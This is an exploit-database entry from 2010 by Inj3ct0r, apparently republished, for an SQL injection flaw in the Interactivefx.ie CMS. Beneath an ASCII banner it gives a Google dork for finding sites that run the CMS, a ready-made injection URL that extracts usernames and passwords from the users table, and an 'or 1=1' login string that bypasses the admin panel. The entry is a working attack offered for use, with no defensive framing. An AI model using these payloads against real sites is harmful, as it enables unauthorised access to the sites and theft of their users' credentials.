[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Interactivefx.ie CMS SQL Injection Vulnerability
# Published : 2010-03-25
# Author : Inj3ct0r
# Previous Title : Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit
# Next Title : INVOhost SQL Injection
================================================
Interactivefx.ie CMS SQL Injection Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
Site product: Interactivefx.ie
Product : Interactivefx.ie CMS
Google dork: "Copyright Interactivefx.ie"
Sql Inj3ct0r Exploit:
http://server/event-details.php?id=223'+select+username,password+from+users/*
Bypass authentication in admin panel:
login: or 1=1/*
pass: anypassyouwish